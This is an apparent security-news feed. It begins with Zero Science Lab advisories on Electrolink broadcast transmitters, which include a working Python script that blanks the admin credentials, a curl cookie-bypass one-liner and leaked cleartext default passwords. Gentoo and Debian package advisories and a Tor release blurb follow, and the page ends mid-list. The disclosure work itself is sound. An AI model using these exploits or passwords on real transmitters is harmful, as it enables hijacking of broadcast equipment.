Electrolink FM/DAB/TV Transmitter suffers from an unauthenticated parameter manipulation that allows an attacker to set the credentials to blank giving her access to the admin panel. It is also vulnerable to account takeover and arbitrary password change.

    #!/usr/bin/env python### Electrolink FM/DAB/TV Transmitter Remote Authentication Removal### Vendor: Electrolink s.r.l.# Product web page: https://www.electrolink.com# Affected version: 10W, 100W, 250W, Compact DAB Transmitter#                   500W, 1kW, 2kW Medium DAB Transmitter#                   2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter#                   100W, 500W, 1kW, 2kW Compact FM Transmitter#                   3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter#                   15W - 40kW Digital FM Transmitter#                   BI, BIII VHF TV Transmitter#                   10W - 5kW UHF TV Transmitter#                   Web version: 01.09, 01.08, 01.07#                   Display version: 1.4, 1.2#                   Control unit version: 01.06, 01.04, 01.03#                   Firmware version: 2.1## Summary: Since 1990 Electrolink has been dealing with design and# manufacturing of advanced technologies for radio and television# broadcasting. The most comprehensive products range includes: FM# Transmitters, DAB Transmitters, TV Transmitters for analogue and# digital multistandard operation, Bandpass Filters (FM, DAB, ATV,# DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial# switches, Manual patch panels, RF power meters, Rigid line and# accessories. A professional solution that meets broadcasters needs# from small community television or radio to big government networks.## Compact DAB Transmitters 10W, 100W and 250W models with 3.5"# touch-screen display and in-built state of the art DAB modulator,# EDI input and GPS receiver. All transmitters are equipped with a# state-of-the art DAB modulator with excellent performances,# self-protected and self-controlled amplifiers ensure trouble-free# non-stop operation.## 100W, 500W, 1kW and 2kW power range available on compact 2U and# 3U 19" frame. Built-in stereo coder, touch screen display and# efficient low noise air cooling system. Available models: 3kW,# 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters# with fully broadband solid state amplifiers and an efficient# low-noise air cooling system.## FM digital modulator with excellent specifications, built-in# stereo and RDS coder. Digital deviation limiter together with# ASI and SDI inputs are available. These transmitters are ready# for ISOFREQUENCY networks.## Available for VHF BI and VHF BIII operation with robust desing# and user-friendly local and remote control. Multi-standard UHF# TV transmitters from 10W up to 5kW with efficient low noise air# cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC# and ISDB-Tb available.## Desc: The application is vulnerable to an unauthenticated# parameter manipulation that allows an attacker to set the# credentials to blank giving her access to the admin panel.# Also vulnerable to account takeover and arbitrary password# change.## Tested on: Mbedthis-Appweb/12.5.0#            Mbedthis-Appweb/12.0.0### Vulnerability discovered by Neurogenesia# Macedonian Information Security Research & Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5792# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php### 30.06.2023##import datetimeimport requestsdt = datetime.datetime.now()dt = dt.strftime('%d.%m.%Y %H:%M:%S')nul = ''print('Starting transmitter exploit at', dt)ip = input('Enter transmitter ip: ')if 'http' not in ip:    ip = 'http://' + ipep = '/login.htm'url = ip + epsignature = {'Accept-Encoding' : 'gzip, deflate',             'Accept-Language' : 'ku-MK,en;q=0.1806',                  'User-Agent' : 'Broadcastso/B.B',                  'Connection' : 'keep-alive'             }# ----------------- Line breaker v0.17 -----------------postd = {    'adminuser' : nul,             'guestuser' : nul,         'adminpassword' : nul,         'guestpassword' : nul         }print('Removing security control...')r = requests.post(url, data = postd, headers = signature)if r.status_code == 200:    print('Done. Go and "Login".')else:    print('Error')exit(-4)

Electrolink FM/DAB/TV Transmitter Remote Authentication Removal

Electrolink FM/DAB/TV Transmitter suffers from an authentication bypass vulnerability affecting the Login Cookie. An attacker can set an arbitrary value except NO to the Login Cookie and have full system access.

    Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication BypassVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The transmitter is vulnerable to an authentication bypassvulnerability affecting the Login Cookie. An attacker can setan arbitrary value except 'NO' to the Login Cookie and havefull system access.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5791Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN"

Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass

Electrolink FM/DAB/TV Transmitter suffers from a disclosure of clear-text credentials in controlloLogin.js that can allow security bypass and system access.

    Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials DisclosureVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The device is vulnerable to a disclosure of clear-textcredentials in controlloLogin.js that can allow securitybypass and system access.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5790Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"function verifica() {        var user = document.getElementById('user').value;        var password = document.getElementById('password').value;        //alert(user);        if(user=='admin' && password=='cozzir'){                SetCookie('Login','OK',exp);                window.location.replace("FrameSetCore.html");        }else{                SetCookie('Login','NO',exp);                window.location.replace("login.html");        }}

Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credential Disclosure

The Electrolink FM/DAB/TV Transmitter suffers from a disclosure of clear-text credentials in login.htm and mail.htm that can allow security bypass and system access.

    Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials DisclosureVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The device is vulnerable to a disclosure of clear-textcredentials in login.htm and mail.htm that can allow securitybypass and system access.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5789Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5789.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw"55:<td class=cd31>Admin password</td>56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td>63:<td class=cd31>Guest password</td>64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td>C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw"93:<td class=cd31>Server password</td>94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>

Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credential Disclosure

Gentoo Linux Security Advisory 202310-1 - Multiple vulnerabilities have been discovered in ClamAV, the worst of which could result in remote code execution. Versions greater than or equal to 0.103.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: ClamAV: Multiple Vulnerabilities  
     Date: October 01, 2023  
     Bugs: #831083, #842813, #894672  
       ID: 202310-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in ClamAV, the worst of  
which could result in remote code execution.

Background  
==========

ClamAV is a GPL virus scanner.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
app-antivirus/clamav  < 0.103.7     >= 0.103.7

Description  
===========

Multiple vulnerabilities have been discovered in ClamAV. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All ClamAV users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.103.7"

References  
==========

[ 1 ] CVE-2022-20698  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20698  
[ 2 ] CVE-2022-20770  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20770  
[ 3 ] CVE-2022-20771  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20771  
[ 4 ] CVE-2022-20785  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20785  
[ 5 ] CVE-2022-20792  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20792  
[ 6 ] CVE-2022-20796  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20796  
[ 7 ] CVE-2022-20803  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20803  
[ 8 ] CVE-2023-20032  
      https://nvd.nist.gov/vuln/detail/CVE-2023-20032  
[ 9 ] CVE-2023-20052  
      https://nvd.nist.gov/vuln/detail/CVE-2023-20052

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-01

Debian Linux Security Advisory 5512-1 - Several vulnerabilities were discovered in Exim, a mail transport agent, which could result in remote code execution if the EXTERNAL or SPA/NTLM authenticators are used.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5512-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 02, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : exim4CVE ID         : CVE-2023-42114 CVE-2023-42115 CVE-2023-42116Several vulnerabilities were discovered in Exim, a mail transport agent,which could result in remote code execution if the EXTERNAL or SPA/NTLMauthenticators are used.For the oldstable distribution (bullseye), these problems have been fixedin version 4.94.2-7+deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 4.96-15+deb12u2.We recommend that you upgrade your exim4 packages.For the detailed security status of exim4 please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/exim4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmUa1ApfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TGThAAlhXEHvEOP7MfFaNN2Nh6Dl6wtFkPjYKB7wljZajtIkmk7IgsxREOMDC+In+344UwfMJyZB49uvO15EV1dcHwUlOAIaDrFMN4SyMVWP+OllFEDMnexQ0+UyuPm0AGMdvokXQq+5tgaRjP7ThOVM0z3+hbPzRr4tQi2tjB/0k1/p9vC4aDJuuf1i8MiVDvtF4s38zlB1f6oCezulgb+wd53VGjL6vk8nzCxWe6RNtpsxzZGdRnA30tDGaBPvdMSbDEcx85U7DViAtXzVvJe+1IdSTBxu8rrUqR9Md1V1zLf8PPyblENwZlc/zJ9ad+EuQnYwsiYUnE72pFYO1mR0b8aE7W8V1t96ijOr323oCN2aWI4HWiteEHcGt8UlE9CT1OG+c5caf7s0L984wEigJxYzc9gTtjX1Y5kh2CAjmvjxPO3v+jRQkPqP9i/x/ax0IvXXeffEUtru1qFscXsgsNru53yRHoGGCo1vwNNwBLuNyD48yFukNFc8rxKK+fjJrCOeSuM21k97T86k9B6sA26IFz/eQJtPXrSC6lzyU75RBWmbPrjEsnqv7GsGUtz1RLLqELhorv+u2SChWsxHMd5rOsZ46bDGoIe+SW7A568blD5P/fv36HYPPXPjFRU7XLS7SUE08cxMUkLHJWMJ/fwIIyEtjoL26oW7r60ITaljg==+Ajg-----END PGP SIGNATURE-----

Debian Security Advisory 5512-1

Debian Linux Security Advisory 5511-1 - Several security vulnerabilities have been discovered in mosquitto, a MQTT compatible message broker, which may be abused for a denial of service attack.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5511-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
October 01, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : mosquitto  
CVE ID         : CVE-2021-34434 CVE-2023-0809 CVE-2023-3592 CVE-2023-28366  
                 CVE-2021-41039  
Debian Bug     : 993400 1001028

Several security vulnerabilities have been discovered in mosquitto, a MQTT  
compatible message broker, which may be abused for a denial of service attack.

CVE-2021-34434

    In Eclipse Mosquitto when using the dynamic security plugin, if the ability  
    for a client to make subscriptions on a topic is revoked when a durable  
    client is offline, then existing subscriptions for that client are not  
    revoked.

CVE-2023-0809

    Fix excessive memory being allocated based on malicious initial packets  
    that are not CONNECT packets.

CVE-2023-3592

    Fix memory leak when clients send v5 CONNECT packets with a will message  
    that contains invalid property types.

CVE-2023-28366

    The broker in Eclipse Mosquitto has a memory leak that can be abused  
    remotely when a client sends many QoS 2 messages with duplicate message  
    IDs, and fails to respond to PUBREC commands. This occurs because of  
    mishandling of EAGAIN from the libc send function.

Additionally CVE-2021-41039 has been fixed for Debian 11 "Bullseye".

CVE-2021-41039

    An MQTT v5 client connecting with a large number of user-property  
    properties could cause excessive CPU usage, leading to a loss of  
    performance and possible denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.0.11-1+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.0.11-1.2+deb12u1.

We recommend that you upgrade your mosquitto packages.

For the detailed security status of mosquitto please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/mosquitto

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmUZx+xfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeTgyhAAwGXTLpeJ0n2FCmZdkhOJCz8qgD4nesLMKGnNH4bq0RWgunDe7CSagvMo  
YG83i4+S0xuH0BLL+5Ytu5Y4MTU9cMJXLaOYL0ivomtjQKilS4aoJQ9ps4bfZPff  
ChsFYi2IUB3VZlNaS8yLIh9Rm8630P51Te9jXTktMwvj8SDalt+HRchR2V5sAsK0  
G8fwSgAP4eIUb3xRWJNrHUXSRgiJpHIeWW8WIo9c0V7Tks/rIoYgXNQiQow1Hde5  
B6k8yHk2xwoXOMoTenY9xrrdY9HZuUqVe9qayl+AMREYmcNPmZvZDpMjUSxdOMdp  
JP/YD6nKp92DNlZG82k/45nWFLogAPQUC2SupaUrPQRJ99xDzlby4KkGt95rKMXE  
4tuc0sqR4EM2v9zhp9jmkIAVzQyBf3vVZNu5yyug0+7/jT/fwh/wFW3B3TTFYH4m  
lD3+9i1NPKt3hdBfZKryWDqmYV+86vvGLVPj5AzNF/JEj9wuFC5DzU44M09Qk2rO  
J0FWk0nKg6SznG5zY8k+L+tcpMYg+RoD/kJXZP+OuvSLUcnYw2NWYcW3sDccO/zI  
cVvIWDmnjei4D3VMkATnkHe7HCqO+bX4nvvytgPxj1WhZ17MIGqs7qRJbCEblDRd  
GZAIo0EWhmsZsEwRaXr7II/0qxOJ2EeXiFsbyYzWQCVOknmnzOI=  
=luvt  
-----END PGP SIGNATURE-----

Debian Security Advisory 5511-1

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.

TOR Virtual Network Tunneling Tool 0.4.8.7

Gentoo Linux Security Advisory 202309-17 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions greater than or equal to 113.0.5672.126 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: September 30, 2023  
     Bugs: #893660, #904252, #904394, #904560, #905297, #905620, #905883, #906586  
       ID: 202309-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Chromium and its  
derivatives, the worst of which could result in remote code execution.

Background  
==========

Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web.

Google Chrome is one fast, simple, and secure browser for all your  
devices.

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable        Unaffected  
-------------------------  ----------------  -----------------  
www-client/chromium        < 113.0.5672.126  >= 113.0.5672.126  
www-client/chromium-bin    < 113.0.5672.126  Vulnerable!  
www-client/google-chrome   < 113.0.5672.126  >= 113.0.5672.126  
www-client/microsoft-edge  < 113.0.1774.50   >= 113.0.1774.50

Description  
===========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-113.0.5672.126"

All Google Chrome users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-113.0.5672.126"

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-113.0.1774.50"

Gentoo has discontinued support for www-client/chromium-bin. Users  
should unmerge it in favor of the above alternatives:

  # emerge --ask --depclean --verbose "www-client/chromium-bin"

References  
==========

[ 1 ] CVE-2023-0696  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0696  
[ 2 ] CVE-2023-0697  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0697  
[ 3 ] CVE-2023-0698  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0698  
[ 4 ] CVE-2023-0699  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0699  
[ 5 ] CVE-2023-0700  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0700  
[ 6 ] CVE-2023-0701  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0701  
[ 7 ] CVE-2023-0702  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0702  
[ 8 ] CVE-2023-0703  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0703  
[ 9 ] CVE-2023-0704  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0704  
[ 10 ] CVE-2023-0705  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0705  
[ 11 ] CVE-2023-0927  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0927  
[ 12 ] CVE-2023-0928  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0928  
[ 13 ] CVE-2023-0929  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0929  
[ 14 ] CVE-2023-0930  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0930  
[ 15 ] CVE-2023-0931  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0931  
[ 16 ] CVE-2023-0932  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0932  
[ 17 ] CVE-2023-0933  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0933  
[ 18 ] CVE-2023-0941  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0941  
[ 19 ] CVE-2023-1528  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1528  
[ 20 ] CVE-2023-1529  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1529  
[ 21 ] CVE-2023-1530  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1530  
[ 22 ] CVE-2023-1531  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1531  
[ 23 ] CVE-2023-1532  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1532  
[ 24 ] CVE-2023-1533  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1533  
[ 25 ] CVE-2023-1534  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1534  
[ 26 ] CVE-2023-1810  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1810  
[ 27 ] CVE-2023-1811  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1811  
[ 28 ] CVE-2023-1812  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1812  
[ 29 ] CVE-2023-1813  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1813  
[ 30 ] CVE-2023-1814  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1814  
[ 31 ] CVE-2023-1815  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1815  
[ 32 ] CVE-2023-1816  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1816  
[ 33 ] CVE-2023-1817  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1817  
[ 34 ] CVE-2023-1818  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1818  
[ 35 ] CVE-2023-1819  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1819  
[ 36 ] CVE-2023-1820  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1820  
[ 37 ] CVE-2023-1821  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1821  
[ 38 ] CVE-2023-1822  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1822  
[ 39 ] CVE-2023-1823  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1823  
[ 40 ] CVE-2023-2033  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2033  
[ 41 ] CVE-2023-2133  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2133  
[ 42 ] CVE-2023-2134  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2134  
[ 43 ] CVE-2023-2135  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2135  
[ 44 ] CVE-2023-2136  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2136  
[ 45 ] CVE-2023-2137  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2137  
[ 46 ] CVE-2023-2459  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2459  
[ 47 ] CVE-2023-2460  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2460  
[ 48 ] CVE-2023-2461  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2461  
[ 49 ] CVE-2023-2462  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2462  
[ 50 ] CVE-2023-2463  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2463  
[ 51 ] CVE-2023-2464  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2464  
[ 52 ] CVE-2023-2465  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2465  
[ 53 ] CVE-2023-2466  
